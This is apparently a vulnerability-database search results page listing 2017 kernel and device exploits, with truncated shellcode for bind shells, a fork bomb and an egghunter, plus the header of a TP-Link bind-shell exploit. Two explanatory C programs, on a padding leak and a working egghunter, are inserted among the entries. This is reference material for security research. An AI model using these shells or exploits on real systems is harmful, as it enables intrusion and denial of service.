Lucene search

1576 matches found

exploitpack · added 2017/12/27 12:00 a.m. · 24 views

Sony Playstation 4 (PS4) 4.05 - Jailbreak WebKit NamedObj Kernel Loader

PS4 4.05 Kernel Exploit --- Summary: In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking an...

AI score 7.4 · Exploits: 0
0day.today · added 2017/12/12 12:00 a.m. · 53 views

macOS getrusage Stack Leak Exploit

Exploit for the macOS platform, category dos / poc. macOS getrusage stack leak through struct padding (CVE-2017-13869). For 64-bit processes, the getrusage syscall handler converts a struct rusage to a struct user64_rusage using munge_user64_rusage, then copies the struct user64_rusage to userspace: int...

CVSS 4.3 · AI score 6.4 · EPSS 0.04736 · Exploits: 3
Exploit DB · added 2017/12/12 12:00 a.m. · 55 views

Apple XNU Kernel - Memory Corruption due to Integer Overflow in __offsetof Usage in posix_spawn on 32-bit Platforms

posix_spawn is a complex syscall which takes a lot of arguments from userspace. The third argument is a pointer to a further arguments descriptor in userspace with the following structure on 32-bit:

    struct user32__posix_spawn_args_desc {
        uint32_t attr_size;    /* size of attributes block */
        uint32_t attrp;        /* ...

AI score 7.4 · Exploits: 0
Exploit DB · added 2017/12/11 12:00 a.m. · 34 views

Apple macOS - 'getrusage' Stack Leak Through struct Padding

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405. For 64-bit processes, the getrusage syscall handler converts a struct rusage to a struct user64_rusage using munge_user64_rusage, then copies the struct user64_rusage to userspace: int getrusage(struct proc *p, struct getrusage_arg...

AI score 7.4 · Exploits: 0
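Both getrusage entries above describe the same bug class: the kernel builds an output struct field by field in a stack slot and copies the whole object out, so the padding bytes that no field assignment ever touches carry whatever the stack held before. The C program below is an added example, not code from either listing and not XNU's code. It uses hypothetical `timeval64_like` / `rusage64_like` layouts with the same int64-then-int32 shape as the conversion described above, plants a marker byte where stale stack data would be, runs the conversion once as written and once with the struct zeroed first, and counts how many marker bytes reach the "user" buffer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical layouts shaped like the 64-bit rusage conversion described
 * above: an int64 seconds field followed by an int32 microseconds field.
 * On an LP64 ABI each timeval64_like carries 4 bytes of tail padding that
 * no field assignment ever writes. These are not XNU's definitions. */
struct timeval64_like {
    int64_t tv_sec;
    int32_t tv_usec;
};

struct rusage64_like {
    struct timeval64_like ru_utime;
    struct timeval64_like ru_stime;
    int64_t ru_maxrss;
};

/* Stand-in for whatever the kernel stack held before the struct was built. */
#define STALE 0xA5

/* One stack slot viewed both as the struct and as raw bytes, so the
 * "previous contents" can be planted deterministically for the demo. */
union stack_slot {
    struct rusage64_like u;
    unsigned char raw[sizeof(struct rusage64_like)];
};

/* Bytes of rusage64_like that belong to no named field. */
size_t padding_bytes(void)
{
    return sizeof(struct rusage64_like)
         - 2 * (sizeof(int64_t) + sizeof(int32_t))   /* two timevals */
         - sizeof(int64_t);                           /* ru_maxrss */
}

/* "Kernel side": fill the output struct field by field in a stack slot that
 * still holds stale data, then copy the whole object out (memcpy stands in
 * for copyout()). zero_first selects the fix: clear the slot before use. */
static size_t convert_and_copy(unsigned char *out, int zero_first)
{
    union stack_slot s;
    memset(s.raw, STALE, sizeof s.raw);        /* model stale stack contents */
    if (zero_first)
        memset(&s.u, 0, sizeof s.u);           /* hardened: padding now zero */
    s.u.ru_utime.tv_sec = 1;  s.u.ru_utime.tv_usec = 2;
    s.u.ru_stime.tv_sec = 3;  s.u.ru_stime.tv_usec = 4;
    s.u.ru_maxrss = 5;
    memcpy(out, s.raw, sizeof s.raw);
    return sizeof s.raw;
}

/* "User side": count how many STALE bytes arrived. The field values are
 * small integers whose bytes are never 0xA5, so every hit is padding. */
static size_t count_stale(const unsigned char *buf, size_t n)
{
    size_t c = 0;
    for (size_t i = 0; i < n; i++)
        if (buf[i] == STALE)
            c++;
    return c;
}

size_t leaked_bytes_vulnerable(void)
{
    unsigned char out[sizeof(struct rusage64_like)];
    size_t n = convert_and_copy(out, 0);
    return count_stale(out, n);
}

size_t leaked_bytes_hardened(void)
{
    unsigned char out[sizeof(struct rusage64_like)];
    size_t n = convert_and_copy(out, 1);
    return count_stale(out, n);
}

int main(void)
{
    printf("struct size %zu, padding %zu\n",
           sizeof(struct rusage64_like), padding_bytes());
    printf("stale bytes copied out: vulnerable=%zu hardened=%zu\n",
           leaked_bytes_vulnerable(), leaked_bytes_hardened());
    return 0;
}
```

Every marker byte the user side sees is a byte the conversion never wrote, and on an LP64 target the count equals the struct's padding exactly. The hardened path differs only in the memset before the field stores, which is the usual fix for this class of bug; assigning every field is not enough, because field assignments leave padding untouched.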
OSV · added 2017/11/29 3:29 a.m. · 2 views

DEBIAN-CVE-2017-17053

The init_new_context function in arch/x86/include/asm/mmu_context.h in the Linux kernel before 4.12.10 does not correctly handle errors from LDT table allocation when forking a new process, allowing a local attacker to achieve a use-after-free or possibly have unspecified other impact by running a...

CVSS 7 · AI score 6.5 · EPSS 0.00376 · Exploits: 0 · References: 1
OSV · added 2017/11/29 3:29 a.m. · 0 views

UBUNTU-CVE-2017-17053

The init_new_context function in arch/x86/include/asm/mmu_context.h in the Linux kernel before 4.12.10 does not correctly handle errors from LDT table allocation when forking a new process, allowing a local attacker to achieve a use-after-free or possibly have unspecified other impact by running a...

CVSS 7 · AI score 6.8 · EPSS 0.00376 · Exploits: 0 · References: 5
0day.today · added 2017/11/25 12:00 a.m. · 29 views

Linux - mincore() Uninitialized Kernel Heap Page Disclosure Exploit

Linux mincore discloses uninitialized kernel heap pages. When walk_page_range is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore assumes that it will always get callbacks for all pages in the range passed to walk_page_range, and when...

AI score 6.8 · Exploits: 0
Exploit DB · added 2017/11/23 12:00 a.m. · 24 views

Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)

Shellcode for the Linux/x86-64 platform:

    global _start
    section .text
    _start:
        xor rsi, rsi
        push rsi            ; starts the search at position 0
        pop rdi
    next_page:
        or di, 0xfff
        inc rdi
    next_4bytes:
        push 21
        pop rax
        syscall
        cmp al, 0xf2
        jz next_page
        mov ...

AI score 7.1 · Exploits: 0
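The egghunter above is the classic access(2)-probing loop: syscall 21 is issued on each candidate address, a result whose low byte is 0xf2 (-EFAULT) means the page is unmapped and the search jumps to the next page, and anything else means the bytes were readable and can be compared against the egg. The C program below is an added example, not the listed shellcode and not from its author: it implements the same probe-then-compare loop over a small constructed hunting ground (three mmap'd pages, the middle one made PROT_NONE, the doubled 0xbeefbeef egg planted 100 bytes into the last page). The function names, the `EGG` constant and the page layout are choices made for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Same marker as the listed shellcode. It is searched for twice in a row so
 * the hunter's own copy of the constant is never mistaken for the egg. */
#define EGG 0xbeefbeefu

static size_t page_size(void)
{
    long v = sysconf(_SC_PAGESIZE);
    return v > 0 ? (size_t)v : 4096;
}

/* Let the kernel touch the memory for us. The shellcode issues raw syscall
 * 21 (access) and tests the low byte of the result for 0xf2 (-EFAULT);
 * through libc the same condition is a -1 return with errno == EFAULT.
 * Any other outcome (ENOENT, ENAMETOOLONG, ...) means the bytes from p up
 * to the first NUL were readable. Known limitation, shared with the asm:
 * a NUL-free run that crosses into an unmapped page also reports EFAULT. */
static int probe_readable(const void *p)
{
    errno = 0;
    return !(access((const char *)p, F_OK) == -1 && errno == EFAULT);
}

static uint32_t load32(const unsigned char *p)
{
    uint32_t v;
    memcpy(&v, p, sizeof v);            /* exactly 4 bytes, never wider */
    return v;
}

/* Scan [start, end) in 4-byte steps for egg||egg. On EFAULT jump to the
 * first byte of the next page (the `or di, 0xfff` / `inc rdi` pair).
 * Returns the address just past the doubled egg, or NULL. */
const unsigned char *egghunt(const unsigned char *start,
                             const unsigned char *end, uint32_t egg)
{
    const size_t pg = page_size();
    const unsigned char *p = start;

    while (p + 2 * sizeof egg <= end) {
        if (!probe_readable(p)) {
            p = (const unsigned char *)(((uintptr_t)p | (pg - 1)) + 1);
            continue;
        }
        /* A matching first word contains no NUL, so the probe above already
         * read past it successfully: the second load cannot fault. */
        if (load32(p) == egg && load32(p + 4) == egg)
            return p + 8;
        p += 4;
    }
    return NULL;
}

/* Probe one fresh page mapped with prot: 1 readable, 0 faulted, -1 no mmap. */
int demo_probe(int prot)
{
    const size_t pg = page_size();
    void *p = mmap(NULL, pg, prot, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;
    int r = probe_readable(p);
    munmap(p, pg);
    return r;
}

/* Constructed hunting ground: three anonymous pages, the middle one PROT_NONE
 * so the probe has something to fault on, the doubled egg 100 bytes into the
 * last page. Returns the hit's offset from base, -1 on setup failure, -2 if
 * the egg was not found. */
long demo_found_offset(void)
{
    const size_t pg = page_size();
    unsigned char *base = mmap(NULL, 3 * pg, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return -1;
    uint32_t egg = EGG;
    memcpy(base + 2 * pg + 100, &egg, sizeof egg);
    memcpy(base + 2 * pg + 104, &egg, sizeof egg);
    long off = -1;
    if (mprotect(base + pg, pg, PROT_NONE) == 0) {
        const unsigned char *hit = egghunt(base, base + 3 * pg, EGG);
        off = hit ? (long)(hit - base) : -2;
    }
    munmap(base, 3 * pg);
    return off;
}

int main(void)
{
    printf("PROT_NONE page readable: %d, zeroed page readable: %d\n",
           demo_probe(PROT_NONE), demo_probe(PROT_READ | PROT_WRITE));
    printf("egg found at offset %ld (expected %zu)\n",
           demo_found_offset(), 2 * page_size() + 108);
    return 0;
}
```

A zeroed page is an empty pathname, so access() on it fails with ENOENT rather than EFAULT and the page counts as readable; the PROT_NONE page is the one the kernel faults on. The scan issues one syscall per 4-byte step, as the shellcode does. Probing only once per page would be faster, but would lose the property that a matching first word guarantees the second word can be read, and would change how the EFAULT-on-page-crossing limitation shows up.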
n0where · added 2017/11/14 8:21 p.m. · 255 views

Unsupervised Coverage-Guided Kernel Fuzzer: syzkaller

syzkaller is an unsupervised coverage-guided kernel fuzzer. Linux kernel fuzzing has the most support; Akaros, FreeBSD, Fuchsia, NetBSD and Windows are supported to varying degrees. Initially, syzkaller was developed with Linux kernel fuzzing in mind, but now it's being extended to support other ...

AI score 7.1 · Exploits: 0 · References: 16
Exploit DB · added 2017/11/09 12:00 a.m. · 6189 views

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

Shellcode for the Linux/x86-64 platform:

    global _start
    _start:
        ; sock = socket(AF_INET, SOCK_STREAM, 0)
        ; AF_INET = 2
        ; SOCK_STREAM = 1
        ; syscall number 41
        push 41
        pop rax
        push 2
        pop rdi
        push 1
        pop rsi
        cdq
        syscall
        ; cop...

AI score 7.1 · Exploits: 0
Packet Storm · added 2017/11/07 12:00 a.m. · 93 views

Linux Kernel 4.13 (Ubuntu 17.10) waitid() SMEP/SMAP Privilege Escalation

    // Proof of concept exploit for waitid bug introduced in Linux Kernel 4.13
    // By Chris Salls twitter.com/chrissalls
    // This exploit can be used to break out of sandboxes such as that in Google Chrome
    // In this proof of concept we install the seccomp filter from Chrome as well as a chroot,
    // ...

AI score 7.9 · EPSS 0.03714 · Exploits: 10
seebug.org · added 2017/10/24 12:00 a.m. · 104 views

Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation (CVE-2017-5123)

This is a guest post by a young and talented Portuguese exploiter, Federico Bento. He won this year's Pwnie for Epic Achievement exploiting the TIOCSTI ioctl. Days ago he posted a video demonstrating an exploit for CVE-2017-5123 and luckily for you I managed to convince him to do a write-up about it. ...

AI score 8.2 · EPSS 0.03714 · Exploits: 10
exploitpack · added 2017/10/17 12:00 a.m. · 15 views

Microsoft Windows - nt!NtQueryObject (ObjectNameInformation) Kernel Pool Memory Disclosure

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1303&desc=2. We have discovered that the nt!NtQueryObject syscall handler discloses portions of uninitialized pool memory to user-mode client...

AI score 7.4 · Exploits: 0
exploitpack · added 2017/10/17 12:00 a.m. · 16 views

TP-Link WR940N - (Authenticated) Remote Code

    import urllib2
    import base64
    import hashlib
    from optparse import *
    import sys
    import urllib

    banner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in th...

AI score 7.8 · Exploits: 0
ArchLinux · added 2017/10/17 12:00 a.m. · 34 views

[ASA-201710-26] linux: privilege escalation

Arch Linux Security Advisory ASA-201710-26
Severity: High
Date: 2017-10-17
CVE-ID: CVE-2017-5123
Package: linux
Type: privilege escalation
Remote: No
Link: https://security.archlinux.org/AVG-444
Summary: The package linux before version...

CVSS 8.8 · AI score 1.5 · EPSS 0.03714 · Exploits: 10 · References: 4
seebug.org · added 2017/10/13 12:00 a.m. · 54 views

Kaspersky Internet Security KLIF Driver NtAdjustTokenPrivileges_HANDLER Denial of Service (CVE-2016-4305)

Summary: A denial of service vulnerability exists in the syscall filtering functionality of the Kaspersky Internet Security KLIF driver. A specially crafted native API call can cause an access violation in the KLIF kernel driver, resulting in local denial of service. An attacker can run a program from user mo...

CVSS 2.1 · AI score 5.6 · EPSS 0.0049 · Exploits: 2
seebug.org · added 2017/10/13 12:00 a.m. · 28 views

Kaspersky Internet Security KLIF Driver NtUserCreateWindowEx_HANDLER Denial of Service (CVE-2016-4304)

Summary: A denial of service vulnerability exists in the syscall filtering functionality of the Kaspersky Internet Security KLIF driver. A specially crafted native API call request can cause an access violation exception in the KLIF kernel driver, resulting in local denial of service. An attacker can ru...

CVSS 2.1 · AI score 5.5 · EPSS 0.0049 · Exploits: 2
0day.today · added 2017/09/11 12:00 a.m. · 31 views

Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)

    /* Andrea Sindoni - @invictus1306
       This shellcode is part of my episodes: ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
       Environment: Raspberry Pi 3
       Default settings for port: 4444 */

    .syntax unified
    .global _start
    _start:
        mov r1, 0x5C    @ r1=0x5c
        mov r5, 0x11    @ ...

AI score 7.4 · Exploits: 0
OSV · added 2017/09/05 12:00 a.m. · 2 views

UBUNTU-CVE-2017-14140

The move_pages system call in mm/migrate.c in the Linux kernel before 4.12.9 doesn't check the effective uid of the target process, enabling a local attacker to learn the memory layout of a setuid executable despite ASLR...

CVSS 5.5 · AI score 6.7 · EPSS 0.00469 · Exploits: 0 · References: 9
0day.today · added 2017/08/21 12:00 a.m. · 21 views

Linux/x86_64 - Fork Bomb Shellcode (11 bytes)

    ;Title: Linux/x86_64 - Fork Bomb 11 bytes
    ;Author: Touhid M. Shaikh
    ;Contact: https://twitter.com/touhidshaikh
    ;Category: Shellcode
    ;Architecture: Linux x86_64
    ;Description: WARNING! This shellcode may crash your computer if executed on your system.
    ;Shellcode Length: 11
    ;Tested on: Debian...

Exploits: 0